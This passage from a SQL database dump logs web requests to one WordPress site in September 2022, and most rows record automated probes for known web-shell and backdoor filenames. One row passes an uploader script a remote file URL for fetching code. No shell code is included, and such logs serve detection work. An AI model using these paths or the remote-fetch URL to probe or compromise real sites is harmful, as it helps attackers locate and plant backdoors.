05:02:18','0000-00-00 00:00:00',301),(37903,'https://malehus.in.ua/wp-xxx.php',NULL,'','',1,0,'2022-09-11 05:02:20','0000-00-00 00:00:00',301),(37904,'https://malehus.in.ua/wp-content/plugins/aryabot/upx.php',NULL,'','',1,0,'2022-09-11 05:02:21','0000-00-00 00:00:00',301),(37905,'https://malehus.in.ua/wp-admin/css/colors/coffee/upload.php',NULL,'','',1,0,'2022-09-11 05:02:22','0000-00-00 00:00:00',301),(37906,'https://malehus.in.ua/wp-admin/za2xv.php',NULL,'','',1,0,'2022-09-11 05:02:23','0000-00-00 00:00:00',301),(37907,'https://malehus.in.ua/wp-admin/css/colors/coffee/shell.php',NULL,'','',1,0,'2022-09-11 05:02:24','0000-00-00 00:00:00',301),(37908,'https://malehus.in.ua/wp-content/fox.php',NULL,'','',1,0,'2022-09-11 05:02:26','0000-00-00 00:00:00',301),(37909,'https://malehus.in.ua/wp-admin/css/shadowx.php',NULL,'','',1,0,'2022-09-11 05:02:27','0000-00-00 00:00:00',301),(37910,'https://malehus.in.ua/black.php',NULL,'','',1,0,'2022-09-11 05:02:28','0000-00-00 00:00:00',301),(37911,'https://malehus.in.ua/wp-snapshots/ss.php',NULL,'','',1,0,'2022-09-11 05:02:29','0000-00-00 00:00:00',301),(37912,'https://malehus.in.ua/alf42.php',NULL,'','',1,0,'2022-09-11 05:02:31','0000-00-00 00:00:00',301),(37913,'https://malehus.in.ua/utchiha-qtxumw.php',NULL,'','',1,0,'2022-09-11 05:02:33','0000-00-00 00:00:00',301),(37914,'https://malehus.in.ua/wp-admin/xqcms.php',NULL,'','',1,0,'2022-09-11 05:02:34','0000-00-00 00:00:00',301),(37915,'https://malehus.in.ua/ja969o.php',NULL,'','',1,0,'2022-09-11 05:02:37','0000-00-00 00:00:00',301),(37916,'https://malehus.in.ua/utchiha-gsszzsg.php',NULL,'','',1,0,'2022-09-11 05:02:39','0000-00-00 00:00:00',301),(37917,'https://malehus.in.ua/wp-includes/lx.php',NULL,'','',1,0,'2022-09-11 05:02:40','0000-00-00 00:00:00',301),(37918,'https://malehus.in.ua/utchiha-gbjodcx.php',NULL,'','',1,0,'2022-09-11 05:02:42','0000-00-00 00:00:00',301),(37919,'https://malehus.in.ua/wp-includes/fox.php',NULL,'','',1,0,'2022-09-11 05:02:43','0000-00-00 00:00:00',301),(37920,'https://malehus.in.ua/wp-content/plugins/tusupugnpr/up.php?php=anonymousfox.is/_@files/php/up.txt',NULL,'','',1,0,'2022-09-11 05:02:45','0000-00-00 00:00:00',301),(37921,'https://malehus.in.ua/hehe.php',NULL,'','',1,0,'2022-09-11 05:02:46','0000-00-00 00:00:00',301),(37922,'https://malehus.in.ua/rhcliopq.php',NULL,'','',1,0,'2022-09-11 05:02:47','0000-00-00 00:00:00',301),(37923,'https://malehus.in.ua/utchiha-juug.php',NULL,'','',1,0,'2022-09-11 05:02:48','0000-00-00 00:00:00',301),(37924,'https://malehus.in.ua/downloadapp/wp-2019.php',NULL,'','',1,0,'2022-09-11 05:02:50','0000-00-00 00:00:00',301),(37925,'https://malehus.in.ua/site_islemleri.php',NULL,'','',1,0,'2022-09-11 05:02:50','0000-00-00 00:00:00',301),(37926,'https://malehus.in.ua/wp-content/codeboy1877_up.php',NULL,'','',1,0,'2022-09-11 05:02:51','0000-00-00 00:00:00',301),(37927,'https://malehus.in.ua/homepage-index.php',NULL,'','',1,0,'2022-09-11 05:02:52','0000-00-00 00:00:00',301),(37928,'https://malehus.in.ua/wp-admin/css/colors/coffee/gelay.php',NULL,'','',1,0,'2022-09-11 05:02:53','0000-00-00 00:00:00',301),(37929,'https://malehus.in.ua/.tmb/cache/wso.php',NULL,'','',1,0,'2022-09-11 05:02:55','0000-00-00 00:00:00',301),(37930,'https://malehus.in.ua/maileraso.php',NULL,'','',1,0,'2022-09-11 05:02:56','0000-00-00 00:00:00',301),(37931,'https://malehus.in.ua/alfa_data/alfacgiapi/uploader.php',NULL,'','',1,0,'2022-09-11 05:02:57','0000-00-00 00:00:00',301),(37932,'https://malehus.in.ua/yo.php',NULL,'','',1,0,'2022-09-11 05:02:59','0000-00-00 00:00:00',301),(37933,'https://malehus.in.ua/simple_php_backdoor_by_dk.php',NULL,'','',1,0,'2022-09-11 05:03:01','0000-00-00 00:00:00',301),(37934,'https://malehus.in.ua/tmpurufu.php',NULL,'','',1,0,'2022-09-11 05:03:02','0000-00-00 00:00:00',301),(37935,'https://malehus.in.ua/wp-content/a.php',NULL,'','',1,0,'2022-09-11 05:03:03','0000-00-00 00:00:00',301),(37936,'https://malehus.in.ua/wp-admin/css/colors/coffee/alfawso.php',NULL,'','',1,0,'2022-09-11 05:03:04','0000-00-00 00:00:00',301),(37937,'https://malehus.in.ua/utchiha-cajt.php',NULL,'','',1,0,'2022-09-11 05:03:05','0000-00-00 00:00:00',301),(37938,'https://malehus.in.ua/room.php',NULL,'','',1,0,'2022-09-11 05:03:07','0000-00-00 00:00:00',301),(37939,'https://malehus.in.ua/utchiha-souelgbv.php',NULL,'','',1,0,'2022-09-11 05:03:08','0000-00-00 00:00:00',301),(37940,'https://malehus.in.ua/alfa_data/alfacgiapi/alfa.php',NULL,'','',1,0,'2022-09-11 05:03:09','0000-00-00 00:00:00',301),(37941,'https://malehus.in.ua/wp-content/small.php',NULL,'','',1,0,'2022-09-11 05:03:11','0000-00-00 00:00:00',301),(37942,'https://malehus.in.ua/main/123.php',NULL,'','',1,0,'2022-09-11 05:03:12','0000-00-00 00:00:00',301),(37943,'https://malehus.in.ua/wp-content/smylyala.php',NULL,'','',1,0,'2022-09-11 05:03:13','0000-00-00 00:00:00',301),(37944,'https://malehus.in.ua/wp-admin/z.php',NULL,'','',1,0,'2022-09-11 05:03:15','0000-00-00 00:00:00',301),(37945,'https://malehus.in.ua/k.phpzone-h.php',NULL,'','',1,0,'2022-09-11 05:03:17','0000-00-00 00:00:00',301),(37946,'https://malehus.in.ua/wp-content/plnejjhbrg.php',NULL,'','',1,0,'2022-09-11 05:03:18','0000-00-00 00:00:00',301),(37947,'https://malehus.in.ua/utchiha-mfgey.php',NULL,'','',1,0,'2022-09-11 05:03:19','0000-00-00 00:00:00',301),(37948,'https://malehus.in.ua/simple-shell.php',NULL,'','',1,0,'2022-09-11 05:03:19','0000-00-00 00:00:00',301),(37949,'https://malehus.in.ua/wxo.php',NULL,'','',1,0,'2022-09-11 05:03:20','0000-00-00 00:00:00',301),(37950,'https://malehus.in.ua/wp-admin/codeboy1877_up.php',NULL,'','',1,0,'2022-09-11 05:03:21','0000-00-00 00:00:00',301),(37951,'https://malehus.in.ua/wp-admin/ice.php',NULL,'','',1,0,'2022-09-11 05:03:22','0000-00-00 00:00:00',301),(37952,'https://malehus.in.ua/wp-content/plugins/aryabot/byps.php',NULL,'','',1,0,'2022-09-11 05:03:23','0000-00-00 00:00:00',301),(37953,'https://malehus.in.ua/js/ice.php',NULL,'','',1,0,'2022-09-11 05:03:24','0000-00-00 00:00:00',301),(37954,'https://malehus.in.ua/wp-admin/wso32.php',NULL,'','',1,0,'2022-09-11 05:03:25','0000-00-00 00:00:00',301),(37955,'https://malehus.in.ua/wp-rmd.php',NULL,'','',1,0,'2022-09-11 05:03:26','0000-00-00 00:00:00',301),(37956,'https://malehus.in.ua/ww.php',NULL,'','',1,0,'2022-09-11 05:03:27','0000-00-00 00:00:00',301),(37957,'https://malehus.in.ua/alfa3.php',NULL,'','',1,0,'2022-09-11 05:03:27','0000-00-00 00:00:00',301),(37958,'https://malehus.in.ua/0x1999,private,shell,(0x,shell).php',NULL,'','',1,0,'2022-09-11 05:03:28','0000-00-00 00:00:00',301),(37959,'https://malehus.in.ua/utchiha-oemi.php',NULL,'','',1,0,'2022-09-11 05:03:30','0000-00-00 00:00:00',301),(37960,'https://malehus.in.ua/gxsyuzkutr.php',NULL,'','',1,0,'2022-09-11 05:03:32','0000-00-00 00:00:00',301),(37961,'https://malehus.in.ua/wp-admin/css/colors/coffee/upl.php',NULL,'','',1,0,'2022-09-11 05:03:34','0000-00-00 00:00:00',301),(37962,'https://malehus.in.ua/wp-includes/rest-api/mhjwilvd.php',NULL,'','',1,0,'2022-09-11 05:03:35','0000-00-00 00:00:00',301),(37963,'https://malehus.in.ua/tmp/madspotshell.php',NULL,'','',1,0,'2022-09-11 05:03:36','0000-00-00 00:00:00',301),(37964,'https://malehus.in.ua/xml.php',NULL,'','',1,0,'2022-09-11 05:03:37','0000-00-00 00:00:00',301),(37965,'https://malehus.in.ua/68b4k.php?fox=mwryy',NULL,'','',1,0,'2022-09-11 05:03:39','0000-00-00 00:00:00',301),(37966,'https://malehus.in.ua/nshell,(1).php',NULL,'','',1,0,'2022-09-11 05:03:40','0000-00-00 00:00:00',301),(37967,'https://malehus.in.ua/utchiha-alogtbnj.php',NULL,'','',1,0,'2022-09-11 05:03:41','0000-00-00 00:00:00',301),(37968,'https://malehus.in.ua/5fesj.php',NULL,'','',1,0,'2022-09-11 05:03:42','0000-00-00 00:00:00',301),(37969,'https://malehus.in.ua/tmp/2.php',NULL,'','',1,0,'2022-09-11 05:03:42','0000-00-00 00:00:00',301),(37970,'https://malehus.in.ua/wp-admin/ysf87.php',NULL,'','',1,0,'2022-09-11 05:03:44','0000-00-00 00:00:00',301),(37971,'https://malehus.in.ua/f6qxl.php',NULL,'','',1,0,'2022-09-11 05:03:44','0000-00-00 00:00:00',301),(37972,'https://malehus.in.ua/wp-admin/css/404.php',NULL,'','',1,0,'2022-09-11 05:03:45','0000-00-00 00:00:00',301),(37973,'https://malehus.in.ua/utchiha-jzxv.php',NULL,'','',1,0,'2022-09-11 05:03:46','0000-00-00 00:00:00',301),(37974,'https://malehus.in.ua/wp-content/masshp.php',NULL,'','',1,0,'2022-09-11 05:03:48','0000-00-00 00:00:00',301),(37975,'https://malehus.in.ua/utchiha-mdxnuzqi.php',NULL,'','',1,0,'2022-09-11 05:03:50','0000-00-00 00:00:00',301),(37976,'https://malehus.in.ua/wp-admin/css/colors/coffee/mari.php',NULL,'','',1,0,'2022-09-11 05:03:51','0000-00-00 00:00:00',301),(37977,'https://malehus.in.ua/utchiha-yuzbvaks.php',NULL,'','',1,0,'2022-09-11 05:03:53','0000-00-00 00:00:00',301),(37978,'https://malehus.in.ua/foxwso-full.php',NULL,'','',1,0,'2022-09-11 05:03:53','0000-00-00 00:00:00',301),(37979,'https://malehus.in.ua/wp-admin/about.php',NULL,'','',1,0,'2022-09-11 05:03:54','0000-00-00 00:00:00',301),(37980,'https://malehus.in.ua/foxsh-3izfw/fox.sh',NULL,'','',1,0,'2022-09-11 05:03:55','0000-00-00 00:00:00',301),(37981,'https://malehus.in.ua/hewsioaypm.php',NULL,'','',1,0,'2022-09-11 05:03:56','0000-00-00 00:00:00',301),(37982,'https://malehus.in.ua/fuck.php',NULL,'','',1,0,'2022-09-11 05:03:58','0000-00-00 00:00:00',301),(37983,'https://malehus.in.ua/utchiha-ivoqq.php',NULL,'','',1,0,'2022-09-11 05:04:00','0000-00-00 00:00:00',301),(37984,'https://malehus.in.ua/webr00tv3.php',NULL,'','',1,0,'2022-09-11 05:04:02','0000-00-00 00:00:00',301),(37985,'https://malehus.in.ua/alfav41.php',NULL,'','',1,0,'2022-09-11 05:04:03','0000-00-00 00:00:00',301),(37986,'https://malehus.in.ua/utchiha-emiat.php',NULL,'','',1,0,'2022-09-11 05:04:03','0000-00-00 00:00:00',301),(37987,'https://malehus.in.ua/wp-admin/romfc.php',NULL,'','',1,0,'2022-09-11 05:04:04','0000-00-00 00:00:00',301),(37988,'https://malehus.in.ua/pbggsbuanx.php',NULL,'','',1,0,'2022-09-11 05:04:05','0000-00-00 00:00:00',301),(37989,'https://malehus.in.ua/utchiha-thj.php',NULL,'','',1,0,'2022-09-11 05:04:06','0000-00-00 00:00:00',301),(37990,'https://malehus.in.ua/wp-includes/simplepie/content/type/a.php',NULL,'','',1,0,'2022-09-11 05:04:06','0000-00-00 00:00:00',301),(37991,'https://malehus.in.ua/wp-admin/zgpsy.php',NULL,'','',1,0,'2022-09-11 05:04:07','0000-00-00 00:00:00',301),(37992,'https://malehus.in.ua/utchiha-qedcz.php',NULL,'','',1,0,'2022-09-11 05:04:08','0000-00-00 00:00:00',301),(37993,'https://malehus.in.ua/ext15.php',NULL,'','',1,0,'2022-09-11 05:04:08','0000-00-00 00:00:00',301),(37994,'https://malehus.in.ua/wp-includes/css/about.php',NULL,'','',1,0,'2022-09-11 05:04:10','0000-00-00 00:00:00',301),(37995,'https://malehus.in.ua/cyberneti.php',NULL,'','',1,0,'2022-09-11 05:04:12','0000-00-00 00:00:00',301),(37996,'https://malehus.in.ua/wp-content/plugins/proking/images/eblhfaxj.php',NULL,'','',1,0,'2022-09-11 05:04:15','0000-00-00 00:00:00',301),(37997,'https://malehus.in.ua/tonant.php',NULL,'','',1,0,'2022-09-11 05:04:16','0000-00-00 00:00:00',301),(37998,'https://malehus.in.ua/wp-site.php',NULL,'','',1,0,'2022-09-11 05:04:17','0000-00-00 00:00:00',301),(37999,'https://malehus.in.ua/utchiha-mcksamjv.php',NULL,'','',1,0,'2022-09-11 05:04:18','0000-00-00 00:00:00',301),(38000,'https://malehus.in.ua/images/wp.php',NULL,'','',1,0,'2022-09-11 05:04:20','0000-00-00 00:00:00',301),(38001,'https://malehus.in.ua/wp-admin/css/colors/coffee/minishell.php',NULL,'','',1,0,'2022-09-11 05:04:21','0000-00-00 00:00:00',301),(38002,'https://malehus.in.ua/wp-admin/css/colors/maro.php',NULL,'','',1,0,'2022-09-11 05:04:23','0000-00-00 00:00:00',301),(38003,'https://malehus.in.ua/wp-admin/webr00tv3.php',NULL,'','',1,0,'2022-09-11 05:04:24','0000-00-00 00:00:00',301),(38004,'https://malehus.in.ua/fc11.php',NULL,'','',1,0,'2022-09-11 05:04:24','0000-00-00 00:00:00',301),(38005,'https://malehus.in.ua/wp-admin/alfav41.php',NULL,'','',1,0,'2022-09-11 05:04:25','0000-00-00 00:00:00',301),(38006,'https://malehus.in.ua/.cgi/cache/index.php',NULL,'','',1,0,'2022-09-11 05:04:27','0000-00-00 00:00:00',301),(38007,'https://malehus.in.ua/wp-incleude.php',NULL,'','',1,0,'2022-09-11 05:04:28','0000-00-00 00:00:00',301),(38008,'https://malehus.in.ua/utchiha-erzz.php',NULL,'','',1,0,'2022-09-11 05:04:30','0000-00-00 00:00:00',301),(38009,'https://malehus.in.ua/utchiha-xplnc.php',NULL,'','',1,0,'2022-09-11 05:04:31','0000-00-00 00:00:00',301),(38010,'https://malehus.in.ua/wp-content/plugins/cekidot/alf.php',NULL,'','',1,0,'2022-09-11 05:04:32','0000-00-00 00:00:00',301),(38011,'https://malehus.in.ua/main/a.php',NULL,'','',1,0,'2022-09-11 05:04:33','0000-00-00 00:00:00',301),(38012,'https://malehus.in.ua/888.php',NULL,'','',1,0,'2022-09-11 05:04:35','0000-00-00 00:00:00',301),(38013,'https://malehus.in.ua/po8sa.php',NULL,'','',1,0,'2022-09-11 05:04:36','0000-00-00 00:00:00',301),(38014,'https://malehus.in.ua/wp-db.php',NULL,'','',1,0,'2022-09-11 05:04:41','0000-00-00 00:00:00',301),(38015,'https://malehus.in.ua/tgh.php',NULL,'','',1,0,'2022-09-11 05:04:41','0000-00-00 00:00:00',301),(38016,'https://malehus.in.ua/wp-admin/7o8kq.php',NULL,'','',1,0,'2022-09-11 05:04:43','0000-00-00 00:00:00',301),(38017,'https://malehus.in.ua/codeboy1877x.php',NULL,'','',1,0,'2022-09-11 05:04:46','0000-00-00 00:00:00',301),(38018,'https://malehus.in.ua/date.php',NULL,'','',9,0,'2022-09-11 05:04:47','0000-00-00 00:00:00',301),(38019,'https://malehus.in.ua/wp-includes/css/f0x.ph',NULL,'','',1,0,'2022-09-11 05:04:48','0000-00-00 00:00:00',301),(38020,'https://malehus.in.ua/wp-content/plugins/css-ready-sel/file.php',NULL,'','',1,0,'2022-09-11 05:04:49','0000-00-00 00:00:00',301),(38021,'https://malehus.in.ua/wp-content/uploads/f0x.php',NULL,'','',1,0,'2022-09-11 05:04:51','0000-00-00 00:00:00',301),(38022,'https://malehus.in.ua/utchiha-mydqb.php',NULL,'','',1,0,'2022-09-11 05:04:52','0000-00-00 00:00:00',301),(38023,'https://malehus.in.ua/ray.php',NULL,'','',1,0,'2022-09-11 05:04:53','0000-00-00 00:00:00',301),(38024,'https://malehus.in.ua/wp-content/uploads/simple-file-list/fw.php',NULL,'','',1,0,'2022-09-11 05:04:54','0000-00-00 00:00:00',301),(38025,'https://malehus.in.ua/images/img_shell.php',NULL,'','',1,0,'2022-09-11 05:04:56','0000-00-00 00:00:00',301),(38026,'https://malehus.in.ua/alfa_data/alfacgiapi/fox.php',NULL,'','',1,0,'2022-09-11 05:04:56','0000-00-00 00:00:00',301),(38027,'https://malehus.in.ua/wqppehpe.php',NULL,'','',1,0,'2022-09-11 05:04:59','0000-00-00 00:00:00',301),(38028,'https://malehus.in.ua/tmp/plupload/vuln.php',NULL,'','',1,0,'2022-09-11 05:05:00','0000-00-00 00:00:00',301),(38029,'https://malehus.in.ua/otm4n3x.php',NULL,'','',1,0,'2022-09-11 05:05:02','0000-00-00 00:00:00',301),(38030,'https://malehus.in.ua/index7.php',NULL,'','',1,0,'2022-09-11 05:05:03','0000-00-00 00:00:00',301),(38031,'https://malehus.in.ua/wp-content/lx.php',NULL,'','',1,0,'2022-09-11 05:05:05','0000-00-00 00:00:00',301),(38032,'https://malehus.in.ua/leadchain.php',NULL,'','',1,0,'2022-09-11 05:05:06','0000-00-00 00:00:00',301),(38033,'https://malehus.in.ua/m4r1ju4n4.php',NULL,'','',1,0,'2022-09-11 05:05:08','0000-00-00 00:00:00',301),(38034,'https://malehus.in.ua/b374k.php',NULL,'','',1,0,'2022-09-11 05:05:12','0000-00-00 00:00:00',301),(38035,'https://malehus.in.ua/wp-content/plugins/upspy/up.php',NULL,'','',1,0,'2022-09-11 05:05:16','0000-00-00 00:00:00',301),(38036,'https://malehus.in.ua/images/mini.php',NULL,'','',1,0,'2022-09-11 05:05:17','0000-00-00 00:00:00',301),(38037,'https://malehus.in.ua/wp-admin/includes/edit-tag-menu.php',NULL,'','',1,0,'2022-09-11 05:05:19','0000-00-00 00:00:00',301),(38038,'https://malehus.in.ua/images/wp-init.php',NULL,'','',1,0,'2022-09-11 05:05:21','0000-00-00 00:00:00',301),(38039,'https://malehus.in.ua/znp0rw.php',NULL,'','',1,0,'2022-09-11 05:05:22','0000-00-00 00:00:00',301),(38040,'https://malehus.in.ua/wso2.8.5.php',NULL,'','',1,0,'2022-09-11 05:05:24','0000-00-00 00:00:00',301),(38041,'https://malehus.in.ua/ccx/index.php',NULL,'','',1,0,'2022-09-11 05:05:25','0000-00-00 00:00:00',301),(38042,'https://malehus.in.ua/wp-content/plugins/css-ready/file.php',NULL,'','',1,0,'2022-09-11 05:05:27','0000-00-00 00:00:00',301),(38043,'https://malehus.in.ua/cakt.php',NULL,'','',1,0,'2022-09-11 05:05:30','0000-00-00 00:00:00',301),(38044,'https://malehus.in.ua/wp-content/iu.php',NULL,'','',1,0,'2022-09-11 05:05:31','0000-00-00 00:00:00',301),(38045,'https://malehus.in.ua/wp-2022.php',NULL,'','',1,0,'2022-09-11 05:05:32','0000-00-00 00:00:00',301),(38046,'https://malehus.in.ua/wp-content/plugins/html404/wso25.php',NULL,'','',1,0,'2022-09-11 05:05:33','0000-00-00 00:00:00',301),(38047,'https://malehus.in.ua/logs.php',NULL,'','',1,0,'2022-09-11 05:05:34','0000-00-00 00:00:00',301),(38048,'https://malehus.in.ua/p0wny-shell.php',NULL,'','',1,0,'2022-09-11 05:05:35','0000-00-00 00:00:00',301),(38049,'https://malehus.in.ua/tesla1.php',NULL,'','',1,0,'2022-09-11 05:05:36','0000-00-00 00:00:00',301),(38050,'https://malehus.in.ua/app/v.php',NULL,'','',1,0,'2022-09-11 05:05:39','0000-00-00 00:00:00',301),(38051,'https://malehus.in.ua/utchiha-gxemt.php',NULL,'','',1,0,'2022-09-11 05:05:42','0000-00-00 00:00:00',301),(38052,'https://malehus.in.ua/utchiha-bwvy.php',NULL,'','',1,0,'2022-09-11 05:05:44','0000-00-00 00:00:00',301),(38053,'https://malehus.in.ua/i7r9pbsxmkp.php',NULL,'','',1,0,'2022-09-11 05:05:45','0000-00-00 00:00:00',301),(38054,'https://malehus.in.ua/0byt3m1n1.php',NULL,'','',1,0,'2022-09-11 05:05:48','0000-00-00 00:00:00',301),(38055,'https://malehus.in.ua/wp-admin/includes/upl.php',NULL,'','',1,0,'2022-09-11 05:05:49','0000-00-00 00:00:00',301),(38056,'https://malehus.in.ua/wacking.php',NULL,'','',1,0,'2022-09-11 05:05:52','0000-00-00 00:00:00',301),(38057,'https://malehus.in.ua/23.php',NULL,'','',1,0,'2022-09-11 05:05:53','0000-00-00 00:00:00',301),(38058,'https://malehus.in.ua/wp-admin/maint/langar.php',NULL,'','',1,0,'2022-09-11 05:05:55','0000-00-00 00:00:00',301),(38059,'https://malehus.in.ua/2022.php',NULL,'','',1,0,'2022-09-11 05:05:57','0000-00-00 00:00:00',301),(38060,'https://malehus.in.ua/autload_classmap.php',NULL,'','',1,0,'2022-09-11 05:06:00','0000-00-00 00:00:00',301),(38061,'https://malehus.in.ua/predator.php',NULL,'','',1,0,'2022-09-11 05:06:01','0000-00-00 00:00:00',301),(38062,'https://malehus.in.ua/wp-admin/crqgdlrx.php',NULL,'','',1,0,'2022-09-11 05:06:02','0000-00-00 00:00:00',301),(38063,'https://malehus.in.ua/wp-admin/hb81i.php',NULL,'','',1,0,'2022-09-11 05:06:04','0000-00-00 00:00:00',301),(38064,'https://malehus.in.ua/erutxoqr.php',NULL,'','',1,0,'2022-09-11 05:06:05','0000-00-00 00:00:00',301),(38065,'https://malehus.in.ua/wp-admin/css/colors/coffee/fox.phpfox.php',NULL,'','',1,0,'2022-09-11 05:06:07','0000-00-00 00:00:00',301),(38066,'https://malehus.in.ua/utchiha-rui.php',NULL,'','',1,0,'2022-09-11 05:06:09','0000-00-00 00:00:00',301),(38067,'https://malehus.in.ua/wp-admin/js/xwctknft.php',NULL,'','',1,0,'2022-09-11 05:06:10','0000-00-00 00:00:00',301),(38068,'https://malehus.in.ua/tmp/d.php',NULL,'','',1,0,'2022-09-11 05:06:11','0000-00-00 00:00:00',301),(38069,'https://malehus.in.ua/wp-includes/pomo/a.php',NULL,'','',1,0,'2022-09-11 05:06:11','0000-00-00 00:00:00',301),(38070,'https://malehus.in.ua/ccx/th3_err0r.php',NULL,'','',1,0,'2022-09-11 05:06:13','0000-00-00 00:00:00',301),(38071,'https://malehus.in.ua/images/1.php',NULL,'','',1,0,'2022-09-11 05:06:15','0000-00-00 00:00:00',301),(38072,'https://malehus.in.ua/wp-admin/maint/wp-readindex.php',NULL,'','',1,0,'2022-09-11 05:06:16','0000-00-00 00:00:00',301),(38073,'https://malehus.in.ua/wp-content/uploads/small.php',NULL,'','',1,0,'2022-09-11 05:06:18','0000-00-00 00:00:00',301),(38074,'https://malehus.in.ua/wp-admin/css/colors/coffee/mini.php',NULL,'','',1,0,'2022-09-11 05:06:20','0000-00-00 00:00:00',301),(38075,'https://malehus.in.ua/.tmb/cache/a.php',NULL,'','',1,0,'2022-09-11 05:06:22','0000-00-00 00:00:00',301),(38076,'https://malehus.in.ua/utchiha-qavt.php',NULL,'','',1,0,'2022-09-11 05:06:25','0000-00-00 00:00:00',301),(38077,'https://malehus.in.ua/wp-content/plugins/cache-wordpress/payment.php',NULL,'','',1,0,'2022-09-11 05:06:27','0000-00-00 00:00:00',301),(38078,'https://malehus.in.ua/evil.php',NULL,'','',1,0,'2022-09-11 05:06:33','0000-00-00 00:00:00',301),(38079,'https://malehus.in.ua/burjuva.aspx',NULL,'','',1,0,'2022-09-11 05:06:36','0000-00-00 00:00:00',301),(38080,'https://malehus.in.ua/wp-includes/theme-compat/qcisyxum.php',NULL,'','',1,0,'2022-09-11 05:06:38','0000-00-00 00:00:00',301),(38081,'https://malehus.in.ua/wp-includes/css/fucked.php',NULL,'','',1,0,'2022-09-11 05:06:43','0000-00-00 00:00:00',301),(38082,'https://malehus.in.ua/thesmartestx.php',NULL,'','',1,0,'2022-09-11 05:06:50','0000-00-00 00:00:00',301),(38083,'https://malehus.in.ua/cici.php',NULL,'','',1,0,'2022-09-11 05:07:26','0000-00-00 00:00:00',301),(38084,'https://malehus.in.ua/img/ice.php',NULL,'','',1,0,'2022-09-11 05:07:27','0000-00-00 00:00:00',301),(38085,'https://malehus.in.ua/wp-includes/pomo/mzfsmzequm.php',NULL,'','',1,0,'2022-09-11 05:07:32','0000-00-00 00:00:00',301),(38086,'https://malehus.in.ua/fresh.php',NULL,'','',1,0,'2022-09-11 05:07:34','0000-00-00 00:00:00',301),(38087,'https://malehus.in.ua/masshp.php',NULL,'','',1,0,'2022-09-11 05:07:36','0000-00-00 00:00:00',301),(38088,'https://malehus.in.ua/wp-l0gin.php',NULL,'','',1,0,'2022-09-11 05:07:41','0000-00-00 00:00:00',301),(38089,'https://malehus.in.ua/utchiha-mhxas.php',NULL,'','',1,0,'2022-09-11 05:07:44','0000-00-00 00:00:00',301),(38090,'https://malehus.in.ua/ak-74.php',NULL,'','',1,0,'2022-09-11 05:07:46','0000-00-00 00:00:00',301),(38091,'https://malehus.in.ua/dc.php',NULL,'','',1,0,'2022-09-11 05:07:51','0000-00-00 00:00:00',301),(38092,'https://malehus.in.ua/wp-admin/includes/am.php',NULL,'','',1,0,'2022-09-11 05:07:53','0000-00-00 00:00:00',301),(38093,'https://malehus.in.ua/wp-admin/gpzkqqydqd.php',NULL,'','',1,0,'2022-09-11 05:07:56','0000-00-00 00:00:00',301),(38094,'https://malehus.in.ua/mxrhcuoo.php',NULL,'','',1,0,'2022-09-11 05:07:57','0000-00-00 00:00:00',301),(38095,'https://malehus.in.ua/wlhq3e.php',NULL,'','',1,0,'2022-09-11 05:07:59','0000-00-00 00:00:00',301),(38096,'https://malehus.in.ua/b477fv.php',NULL,'','',1,0,'2022-09-11 05:08:01','0000-00-00 00:00:00',301),(38097,'https://malehus.in.ua/utchiha-hsp.php',NULL,'','',1,0,'2022-09-11 05:08:02','0000-00-00 00:00:00',301),(38098,'https://malehus.in.ua/deleteme.chajbbh2.php',NULL,'','',1,0,'2022-09-11 05:08:12','0000-00-00 00:00:00',301),(38099,'https://malehus.in.ua/fpebr.php',NULL,'','',1,0,'2022-09-11 05:08:14','0000-00-00 00:00:00',301),(38100,'https://malehus.in.ua/.tmb/cache/novbgnbusn.php',NULL,'','',1,0,'2022-09-11 05:08:17','0000-00-00 00:00:00',301),(38101,'https://malehus.in.ua/1788821455_error_log.php',NULL,'','',1,0,'2022-09-11 05:08:18','0000-00-00 00:00:00',301),(38102,'https://malehus.in.ua/utchiha-gzzow.php',NULL,'','',1,0,'2022-09-11 05:08:22','0000-00-00 00:00:00',301),(38103,'https://malehus.in.ua/index9.php',NULL,'','',1,0,'2022-09-11 05:08:24','0000-00-00 00:00:00',301),(38104,'https://malehus.in.ua/wp-includes/css/gelay.php',NULL,'','',1,0,'2022-09-11 05:08:26','0000-00-00 00:00:00',301),(38105,'https://malehus.in.ua/utchiha-cev.php',NULL,'','',1,0,'2022-09-11 05:08:27','0000-00-00 00:00:00',301),(38106,'https://malehus.in.ua/reset.php',NULL,'','',1,0,'2022-09-11 05:08:31','0000-00-00 00:00:00',301),(38107,'https://malehus.in.ua/wp-content/plugins/jibpvts/leajecyg.php',NULL,'','',1,0,'2022-09-11 05:08:32','0000-00-00 00:00:00',301),(38108,'https://malehus.in.ua/utchiha-hxgyyy.php',NULL,'','',1,0,'2022-09-11 05:08:33','0000-00-00 00:00:00',301),(38109,'https://malehus.in.ua/guyakncv.php',NULL,'','',1,0,'2022-09-11 05:08:35','0000-00-00 00:00:00',301),(38110,'https://malehus.in.ua/qly7i.php',NULL,'','',1,0,'2022-09-11 05:08:38','0000-00-00 00:00:00',301),(38111,'https://malehus.in.ua/we1y8.php',NULL,'','',1,0,'2022-09-11 05:08:41','0000-00-00 00:00:00',301),(38112,'https://malehus.in.ua/cliente/downloads/h4xor.php',NULL,'','',1,0,'2022-09-11 05:08:45','0000-00-00 00:00:00',301),(38113,'https://malehus.in.ua/wp-includes/css/yv1n4r.php',NULL,'','',1,0,'2022-09-11 05:08:47','0000-00-00 00:00:00',301),(38114,'https://malehus.in.ua/dom.phpwhmcs.php',NULL,'','',1,0,'2022-09-11 05:08:48','0000-00-00 00:00:00',301),(38115,'https://malehus.in.ua/wp-admin/includes/utchiha-ohadg.php',NULL,'','',1,0,'2022-09-11 05:08:49','0000-00-00 00:00:00',301),(38116,'https://malehus.in.ua/images/priv.php',NULL,'','',1,0,'2022-09-11 05:08:51','0000-00-00 00:00:00',301),(38117,'https://malehus.in.ua/wp-admin/upl.php',NULL,'','',1,0,'2022-09-11 05:08:55','0000-00-00 00:00:00',301),(38118,'https://malehus.in.ua/wp-admin/css/bhx1.php',NULL,'','',1,0,'2022-09-11 05:08:59','0000-00-00 00:00:00',301),(38119,'https://malehus.in.ua/wp-admin/o3bqm.php',NULL,'','',1,0,'2022-09-11 05:08:59','0000-00-00 00:00:00',301),(38120,'https://malehus.in.ua/utchiha-rhvbb.php',NULL,'','',1,0,'2022-09-11 05:09:01','0000-00-00 00:00:00',301),(38121,'https://malehus.in.ua/wp-admin/unziperpoe.php',NULL,'','',1,0,'2022-09-11 05:09:02','0000-00-00 00:00:00',301),(38122,'https://malehus.in.ua/crypted.php',NULL,'','',1,0,'2022-09-11 05:09:03','0000-00-00 00:00:00',301),(38123,'https://malehus.in.ua/wp-admin/ysp6c.php',NULL,'','',1,0,'2022-09-11 05:09:04','0000-00-00 